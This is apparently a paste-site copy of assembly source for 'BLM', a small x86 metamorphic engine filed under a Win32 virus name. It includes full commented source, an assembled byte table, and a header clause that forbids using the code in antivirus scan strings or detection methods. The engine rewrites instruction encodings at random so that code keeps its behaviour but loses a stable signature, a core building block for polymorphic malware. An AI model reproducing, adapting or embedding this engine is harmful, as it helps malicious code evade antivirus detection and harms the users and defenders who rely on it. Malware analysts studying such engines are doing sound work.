
Virus.Win32.BLM - Morphing virus - Source Code

Jun 18th, 2023
  1. ; BLM ~ BlueOwls Light Meta
  2. ; *************************
  3. ;
  4. ; Details
  5. ;
  6. ;  Name: BLM (BlueOwls Light Meta)
  7. ;  Date: 16 May 2005
  8. ;  Size: 412 bytes
  9. ;  Morphing power: light
  10. ;  Morphing type: non-expansion
  11. ;  Compatibility: most common x86 and pentium specific (rdtsc/movzx/..)
  12. ;  Platforms: all 32bit (and maybe 16bit) x86 instruction set OSes
  13. ;  Used compiler: FASM 1.60
  14. ;  Bugs: hopefully none
  15. ;
  16. ; Morphing
  17. ;
  18. ;  The following instructions can be morphed:
  19. ;
  20. ;  1. OP reg, reg -> changing the D bit (2)
  21. ;  2. OP (reg,) [(imm32+)reg] -> changing the unused SCALE bits (4)
  22. ;  3. OP (reg,) [(imm32+)reg+reg*1] -> swapping the regs (2)
  23. ;
  24. ;  Any other instruction's size is calculated and skipped.
  25. ;
  26. ; Usage notes
  27. ;
  28. ;  BLM can be useful for any application which would like to do code
  29. ;  morphing on its own, or other code. There are however, some things
  30. ;  to keep note on:
  31. ;
  32. ;  - Make sure you don't mix data with code, for example:
  33. ;    > CALL _LABEL
  34. ;    > DB "some string",0
  35. ;    > _LABEL:
  36. ;    Would make the meta incorrectly assume "some string",0 to be
  37. ;    code. So make sure that the code area you specify contains no data.
  38. ;  - On input, esi is allowed to equal edi, but this is not recommended
  39. ;    if it would cause the meta to morph itself at runtime.
  40. ;  - This code does not need any data and only needs to be able to
  41. ;    execute. It is completely permutable.
  42. ;
  43. ; Agreement
  44. ;
  45. ;  This  sourcecode  is  meant  to be used  in freeware and  shareware
  46. ;  programs, and therefore it is strictly prohibited to add any of this
  47. ;  code in binary or source format in  scan strings or other detection
  48. ;  methods. If done, it will impact on the sellability of the product,
  49. ;  and can result in high fees and/or trials before court.
  50. ;  YOU HAVE BEEN WARNED
  51.  
  52. use32
  53.  
  54. ; ------------- META SOURCE ---------------------------------------------
  55.  
  56. ; in:   esi(ecx) = start of code to morph
  57. ;       edi(ecx) = start of buffer to put morphed code in
  58. ;       ecx = size of code to morph (and buffer)
  59. ; out:  esi = esi + ecx
  60. ;       edi = edi + ecx
  61. ;       other registers are destroyed (except esp)
  62.  
  ; BLM entry point: copies ecx bytes of code from esi to edi one instruction
  ; at a time, re-encoding the instruction forms listed in the header.
  ; Register roles used throughout the engine:
  ;   esi = read cursor in the source code
  ;   edi = write cursor in the output buffer
  ;   ecx = per-instruction count of trailing bytes (displacement/immediate)
  ;         still to be copied with REP MOVSB; reset to 0 for every instruction
  ;   ebx = operand size in bytes: 4 by default, 2 after a 66h prefix
  ;         (the end-of-code pointer is kept on the stack across the call)
  ;   edx = pseudo-random state, consumed one bit at a time with RCR; it is
  ;         read before anything writes it, so its initial value is whatever
  ;         the caller left in edx (not listed in the "in:" contract above)
  ;   al  = the opcode byte being classified (see the branch_* labels)
  63. BLM:        cld
  64.         lea ebx, [esi+ecx]      ; ebx = ptr to end of code to morph
  ; Main loop: each iteration copies (or morphs) exactly one instruction.
  65. nextcode:   push    ebx             ; save the end pointer; ebx is reused below
  66.         xor ecx, ecx            ; no trailing bytes known yet
  67.         push    4
  68.         pop ebx                 ; ebx = 4 (dword operand size)
  69.         call    .innext         ; skip prefixes, then classify/copy one instruction
  70.         pop ebx                 ; ebx = end pointer again
  71.         rol edx, 7          ; simple RAND function
  72.         neg dx                  ; only the low 16 bits of edx are negated
  73.         cmp ebx, esi
  74.         ja  nextcode            ; unsigned: loop while esi < end
  75.         ret
  76.  
  ; Prefix filter. Each recognised prefix byte is copied unchanged via .next
  ; and the byte after it is examined again; the first non-prefix byte falls
  ; through to opcode. Bit 0 is masked before the 66h compare, so a 67h
  ; (address-size) prefix also sets bl = 2.
  77. .next:      movsb                   ; copy the prefix byte as-is
  78. .innext:    mov al, [esi]
  79.         and al, 11100111b       ; 26h/2Eh/36h/3Eh all map to 26h
  80.         cmp al, 00100110b       ; es/cs/ss/ds segment?
  81.         jz  .next           ; check if more
  82.         mov al, [esi]
  83.         and al, 11111110b       ; pair up 64h/65h, F2h/F3h, 66h/67h
  84.         cmp al, 01100100b       ; fs/gs segment?
  85.         jz  .next           ; check if more
  86.         cmp al, 11110010b       ; repz/repnz?
  87.         jz  .next           ; check if more
  88.         cmp al, 01100110b       ; WORD?
  89.         jnz opcode
  90.         mov bl, 2           ; set WORD size
  91.         jmp .next
  92.  
  93. ; -----------------------------------------------------------------------
  94.  
  ; Opcode classifier. After the 0Fh escape check the opcode byte in al is
  ; shifted left one bit at a time; each SHL moves the next-highest opcode
  ; bit into CF, and the branch_* labels are named after the bits consumed
  ; so far. Compares against immediates further down therefore see the
  ; opcode in its shifted form, not the raw byte.
  95. opcode:     mov al, [esi]
  96.         cmp al, 0fh
  97.         jnz branch_start
  98.         movsb                   ; copy the 0Fh escape byte
  99.         or  al, [esi]       ; ????1111  (al = 0Fh OR second opcode byte)
  100.         cmp al, 10001111b
  101.         jz  .6byte          ; -> jxx label32
  102.         cmp al, 10111111b
  103.         jz  .3byte          ; -> movzx/bt?
  104.         jmp .done               ; any other 0F xx is copied as 2 bytes
  105. .6byte:     movsb
  106.         movsb
  107.         movsb
  108. .3byte:     movsb
  109. .done:      movsb
  110.         ret
  111. branch_start:   shl al, 1               ; CF = opcode bit 7
  112.         jc  branch_1xxxxxxx
  113. branch_0xxxxxxx:shl al, 1               ; CF = opcode bit 6
  114.         jc  branch_01xxxxxx
  115. branch_00xxxxxx:shl al, 4               ; CF = opcode bit 2
  116.         jnc op_rmrm_d               ; 00xxx0xx: ALU r/m,r/m forms
  117. op_eax:     mov al, [esi]               ; reload the raw opcode byte
  118.         shr al, 1               ; CF = opcode bit 0 (byte vs. full-size operand)
  119.         jc  .pr32
  120.         movsb
  121.         movsb
  122.         ret             ; -> op al, imm8
  ; .pr32 is also entered from branch_1011xxxx (mov reg, imm32).
  123. .pr32:      add ecx, ebx        ; -> op eax, imm32  (ecx = operand size, 4 or 2)
  124.         rep movsb               ; opcode plus the first ecx-1 immediate bytes
  125.         movsb                   ; last immediate byte; total = 1 + ebx bytes
  126.         ret
  ; al = opcode << 2 (low 8 bits) at this point.
  127. branch_01xxxxxx:cmp al, 11000000b       ; opcode bits 5,4 == 11 -> 70h..7Fh
  128.         jb  .ncjump
  129.         movsb               ; -> jxx label8
  ; .ncjump is also entered from branch_100xxxxx with al = opcode << 4;
  ; the two compares below are against that shifted al, not the raw opcode.
  130. .ncjump:    cmp al, 068h
  131.         jz  do_5byte        ; -> push imm32
  132.         cmp al, 06ah
  133.         jnz .done           ; -> popad/pushad/pop/push/dec/inc (reg)
  134.         stosb               ; -> push imm8
  135. .done:      movsb
  136.         ret
  137.  
  ; Morph #1 from the header: for the 00xxx0xx ALU opcodes whose ModR/M has
  ; mod == 11 (register, register), randomly flip the opcode's direction (D)
  ; bit and swap the ModR/M reg and r/m fields. Memory forms (mod != 11) and
  ; the randomly skipped cases are copied unchanged by op_rm.
  138. op_rmrm_d:  mov al, [esi+1]     ; -> add/or/adc/sbb/and/sub/xor/cmp r/m,r/m  (al = ModR/M)
  139.         rcr edx, 1          ; rand true/false
  140.         jc  .nomorph            ; CF = 1 -> the jb below is taken -> no morph
  141.         cmp al, 11000000b       ; CF = 1 iff mod != 11
  142. .nomorph:   jb  op_rm           ; (jc == jb so little optimization)
  143.         lodsb                   ; al = opcode
  144.         xor al, 00000010b       ; flip the D bit
  145.         stosb
  146.         lodsb                   ; al = ModR/M (mod == 11)
  147.         and eax, 00111111b      ; 00000000 00regreg
  148.         shl eax, 5          ; 00000reg reg00000
  149.         shr al, 2           ; 00000reg 00reg000
  150.         or  al, ah          ; 00000xxx 00regreg  (reg and r/m swapped)
  151.         or  al, 11000000b       ; 11regreg
  152.         stosb
  153.         ret
  154.  
  ; Opcodes 1xxxxxxx (continued from branch_start, where al = opcode << 1).
  ; Each SHL consumes one more opcode bit into CF; the compares below see
  ; al == opcode << 4 at branch_1000xxxx, branch_1010xxxx, branch_1011xxxx
  ; and branch_1100xxxx. Destinations: op_rm* copy a ModR/M-encoded
  ; instruction with ecx pre-set to the immediate length, do_5byte copies
  ; 5 bytes, and the .done/.2byte/.3byte tails copy a fixed 1/2/3 bytes.
  155. branch_1xxxxxxx:shl al, 1               ; CF = opcode bit 6
  156.         jc  branch_11xxxxxx
  157. branch_10xxxxxx:shl al, 1               ; CF = opcode bit 5
  158.         jc  branch_101xxxxx
  159. branch_100xxxxx:shl al, 1               ; CF = opcode bit 4
  160.         jc  branch_01xxxxxx.ncjump  ; -> xchg eax,reg/cwde/cdq/pushf/popf/sahf/lahf
  161. branch_1000xxxx:cmp al, 01000000b       ; al = opcode << 4; >= 40h means opcode >= 84h
  162.         jae op_rm           ; -> test/xchg/mov/lea/pop r/m(,r/m)
  163.         shl al, 3               ; CF = opcode bit 1
  164.         jc  op_rmimm8       ; -> add/or/adc/sbb/and/sub/xor/cmp r/m,imm8
  165.         jmp op_rmimm32      ; -> add/or/adc/sbb/and/sub/xor/cmp r/m,imm32
  166. branch_101xxxxx:shl al, 1               ; CF = opcode bit 4
  167.         jc  branch_1011xxxx
  168. branch_1010xxxx:and al, 11100000b       ; al = opcode << 4; keep opcode bits 3..1
  169.         cmp al, 00100000b
  170.         jb  op_eax          ; -> test eax, imm
  171.         cmp al, 10000000b
  172.         jz  do_5byte        ; -> mov mem32, eax
  173.         movsb
  174.         ret             ; -> movs/stos/lods/scas
  175. branch_1011xxxx:shl al, 1               ; CF = opcode bit 3
  176.         jnc branch_1100001x.2byte   ; -> mov reg, imm8
  177.         jmp op_eax.pr32     ; -> mov reg, imm32
  178. do_5byte:   movsd                   ; opcode + 4 following bytes
  179.         movsb
  180.         ret
  181. branch_11xxxxxx:shl al, 1               ; CF = opcode bit 5
  182.         jc  branch_111xxxxx
  183. branch_110xxxxx:shl al, 1               ; CF = opcode bit 4
  184.         jc  branch_1101xxxx
  185. branch_1100xxxx:cmp al, 11010000b       ; al = opcode << 4; D0h <=> opcode CDh
  186.         jz  branch_1100001x.2byte   ; -> int imm8
  187.         shl al, 1               ; CF = opcode bit 3
  188.         jc  branch_1100001x.done    ; -> leave/int 3
  189. branch_11000xxx:shl al, 1               ; CF = opcode bit 2
  190.         jc  op_rm_w         ; -> mov r/m, imm
  191. branch_110000xx:shl al, 1               ; CF = opcode bit 1
  192.         jc  branch_1100001x
  193.         inc ecx         ; -> rol/ror/rcl/rcr/shl/shr/sal/sar reg, 1  (one byte follows the ModR/M)
  194.         jmp op_rm
  195. branch_1100001x:shl al, 1               ; CF = opcode bit 0
  196.         jc  .done
  197. .3byte:     movsb
  198. .2byte:     movsb               ; -> ret imm16
  199. .done:      movsb
  200.         ret             ; -> ret
  201. branch_1101xxxx:shl al, 2               ; CF = opcode bit 2
  202.         jc  branch_1100001x.done    ; -> xlatb
  203. branch_1101x0xx:jmp op_rm           ; -> rol/ror/rcl/rcr/shl/shr/sal/sar reg, 1
  204.  
  ; Opcodes 111xxxxx (entered with al = opcode << 3). As above, each SHL
  ; consumes one opcode bit into CF; al == opcode << 5 at branch_11101xxx,
  ; branch_11110xxx and branch_11111xxx.
  205. branch_111xxxxx:shl al, 1               ; CF = opcode bit 4
  206.         jc  branch_1111xxxx
  207. branch_1110xxxx:shl al, 1               ; CF = opcode bit 3
  208.         jnc branch_11101010     ; -> loop label
  209. branch_11101xxx:cmp al, 00100000b       ; al = opcode << 5
  210.         jz  branch_111010x0.done    ; -> call label
  211. branch_111010x0:shl al, 2               ; CF = opcode bit 1
  212.         jc  branch_11101010
  213. .done:      movsd               ; -> jmp label32
  214.         movsb
  215.         ret
  216. branch_11101010:movsb                   ; 2-byte form
  217.         movsb
  218.         ret             ; -> jmp label8
  219. branch_1111xxxx:shl al, 1               ; CF = opcode bit 3
  220.         jc  branch_11111xxx
  221. branch_11110xxx:shl al, 2               ; CF = opcode bit 1
  222.         jnc branch_11111xxx.done    ; -> cmc
  223. branch_11111x1x:mov al, [esi+1]     ; al = modr/m
  224.         and al, 00111000b       ; keep the reg (/digit) field
  225.         jnz op_rm           ; -> not/mul/div/idiv
  226.         jmp op_rm_w         ; -> test
  227. branch_11111xxx:shl al, 1               ; CF = opcode bit 2; al = opcode << 6
  228.         jc  .done           ; -> clc/stc/cli
  229.         shr al, 1               ; CF = low bit of al (al was opcode << 6)
  230.         jc  op_rm           ; -> inc/dec/call/jmp/push
  231. .done:      movsb
  232.         ret             ; -> cld/std
  233.  
  234. ; -----------------------------------------------------------------------
  235.  
  ; Copy one ModR/M-encoded instruction. The entry points add the immediate
  ; length to ecx; the displacement length is added below, and .done copies
  ; the ecx trailing bytes with REP MOVSB:
  ;   op_rm_w    - opcode bit 0 selects imm8 (0) or full-size imm (1)
  ;   op_rmimm32 - ecx += ebx (4, or 2 after a 66h prefix)
  ;   op_rmimm8  - ecx += 1
  ;   op_rm      - nothing beyond what the caller already added to ecx
  ; Morphs #2 and #3 from the header are applied to the SIB byte here.
  236. op_rm_w:    mov al, [esi]
  237.         shr al, 1               ; CF = opcode bit 0
  238.         jnc op_rmimm8
  239. op_rmimm32: add ecx, ebx        ; imm length will be 4 or 2
  240.         dec ecx                 ; cancels the inc below
  241. op_rmimm8:  inc ecx         ; imm length = 1 byte
  242. op_rm:      movsb                   ; copy the opcode byte
  243.         lodsb
  244.         stosb                   ; copy the ModR/M byte unchanged; al = ModR/M
  245.         cmp al, 11000000b       ; op reg, reg
  246.         jae .done               ; mod == 11: no displacement, no SIB
  247.         mov ah, al
  248.         and al, 111b            ; al = r/m field
  249.         shr ah, 6               ; ah = mod field
  250.         jz  .regaddr            ; mod == 00: no displacement unless r/m == 101
  251.         cmp ah, 00000001b
  252.         jz  .ddone              ; mod == 01: disp8
  253.         add ecx, 3          ; op reg, [reg+dword]   (mod == 10: disp32 = 3 + 1 below)
  254. .ddone:     inc ecx         ; op reg, [reg+byte]
  255. .cmpsib:    cmp al, 00000100b       ; r/m == 100: a SIB byte follows
  256.         jnz .done
  257.         xor ebx, ebx            ; ebx = 0; bl will hold the scale bits
  258.         mov eax, ebx            ; eax = 0 before loading the SIB byte
  259.         lodsb               ; 00000000 iiregreg   (ii = scale, then index, then base)
  260.         shl eax, 2          ; 000000ii regreg00
  261.         xchg    bl, ah          ; 00000000 regreg00   (bl = scale)
  262.         shl eax, 3          ; 00000reg reg00000   (ah = index)
  263.         shr al, 5           ; 00000reg 00000reg   (al = base)
  264.         cmp ah, 4
  265.         jz  .randindex          ; index == 100 (none): scale bits are unused -> morph #2
  266.         cmp al, 4
  267.         jz  .nosib              ; base == 100 (esp) is never swapped
  268.         or  bl, bl          ; index = 1?
  269.         jnz .nosib              ; only scale 1 allows swapping base and index
  270.         rcr edx, 1
  271.         jnc .nosib          ; randomly abort switch
  272.         xchg    al, ah          ; swap base and index -> morph #3
  273.         jmp .nosib
  274. .randindex: mov bl, dl          ; index is random
  275.         and bl, 00000011b       ; keep two random bits as the new scale
  276. .nosib:     shl al, 5           ; 00000reg reg00000
  277.         shr eax, 3          ; 00000000 regreg00
  278.         mov ah, bl          ; 000000ii regreg00
  279.         shr eax, 2          ; 00000000 iiregreg
  280.         stosb                   ; write the (possibly rewritten) SIB byte
  281. .done:      rep movsb               ; copy ecx trailing bytes: displacement + immediate
  282.         ret
  283. .regaddr:   cmp al, 00000101b       ; op reg, [dword]
  284.         jnz .cmpsib
  285.         movsd                   ; copy the 32-bit absolute displacement
  286.         jmp .done
  287.  
  288. ; ------------- META BINARY ---------------------------------------------
  289.  
  290. ; in:   esi(ecx) = start of code to morph
  291. ;       edi(ecx) = start of buffer to put morphed code in
  292. ;       ecx = size of code to morph (and buffer)
  293. ; out:  esi = esi + ecx
  294. ;       edi = edi + ecx
  295. ;       other registers are destroyed (except esp)
  296.  
  ; Assembled image of the META SOURCE above: 25 rows of 16 bytes plus 12,
  ; i.e. 412 bytes, matching the Size given in the header. It defines the
  ; same label BLM as the source form, so a build includes either this table
  ; or the source section, not both. The register contract is the one
  ; stated above; as in the source form, edx additionally supplies the
  ; initial random state.
  297. BLM:        db 252,141,28,14,83,49,201,106,4,91,232,13,0,0,0,91
  298.         db 193,194,7,102,247,218,57,243,119,234,195,164,138,6,36,231
  299.         db 60,38,116,247,138,6,36,254,60,100,116,239,60,242,116,235
  300.         db 60,102,117,4,179,2,235,227,138,6,60,15,117,19,164,10
  301.         db 6,60,143,116,6,60,191,116,5,235,4,164,164,164,164,164
  302.         db 195,208,224,114,75,208,224,114,20,192,224,4,115,31,138,6
  303.         db 208,232,114,3,164,164,195,1,217,243,164,164,195,60,192,114
  304.         db 1,164,60,104,116,95,60,106,117,1,170,164,195,138,70,1
  305.         db 209,218,114,2,60,192,15,130,179,0,0,0,172,52,2,170
  306.         db 172,131,224,63,193,224,5,192,232,2,8,224,12,192,170,195
  307.         db 208,224,114,52,208,224,114,23,208,224,114,198,60,64,15,131
  308.         db 139,0,0,0,192,224,3,15,130,129,0,0,0,235,124,208
  309.         db 224,114,12,36,224,60,32,114,149,60,128,116,8,164,195,208
  310.         db 224,115,37,235,146,165,164,195,208,224,114,38,208,224,114,27
  311.         db 60,208,116,20,208,224,114,17,208,224,114,73,208,224,114,3
  312.         db 65,235,76,208,224,114,2,164,164,164,195,192,224,2,114,249
  313.         db 235,61,208,224,114,19,208,224,115,12,60,32,116,5,192,224
  314.         db 2,114,3,165,164,195,164,164,195,208,224,114,14,192,224,2
  315.         db 115,17,138,70,1,36,56,117,22,235,10,208,224,114,4,208
  316.         db 232,114,12,164,195,138,6,208,232,115,3,1,217,73,65,164
  317.         db 172,170,60,192,115,76,136,196,36,7,192,236,6,116,70,128
  318.         db 252,1,116,3,131,193,3,65,60,4,117,54,49,219,137,216
  319.         db 172,193,224,2,134,220,193,224,3,192,232,5,128,252,4,116
  320.         db 16,60,4,116,17,8,219,117,13,209,218,115,9,134,196,235
  321.         db 5,136,211,128,227,3,192,224,5,193,232,3,136,220,193,232
  322.         db 2,170,243,164,195,60,5,117,191,165,235,246
  323.  
  324. ; -----------------------------------------------------------------------
  325.  